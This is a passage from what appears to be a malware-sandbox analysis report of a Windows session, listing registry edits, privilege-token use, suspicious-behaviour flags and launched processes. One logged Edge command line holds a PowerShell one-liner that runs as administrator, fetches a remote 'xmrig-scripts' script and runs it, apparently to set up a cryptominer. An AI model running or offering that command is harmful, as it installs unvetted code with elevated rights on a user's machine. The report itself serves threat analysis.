| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0 = 5a003100000000006d59e73a100053797374656d33320000420009000400efbec5522d606d59e73a2e0000008f360000000001000000000000000000000000000000a7e57400530079007300740065006d0033003200000018000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000200000001000000ffffffff | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3\0\0 = 7e003100000000006d59273b11004465736b746f7000680009000400efbe4759005f6d59273b2e000000365702000000010000000000000000003e000000000078710f004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000 | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616193" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3\0\MRUListEx = 00000000ffffffff | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Modifies registry key
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 506997.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Windows\System32\PickerHost.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\control.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\control.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\control.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\control.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2024 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,16588692230287925884,15859335915128369599,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
C:\Windows\system32\control.exe
"C:\Windows\system32\control.exe" /name Microsoft.AdministrativeTools
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
C:\Windows\system32\control.exe
"C:\Windows\system32\control.exe" /name Microsoft.AdministrativeTools
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3864 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
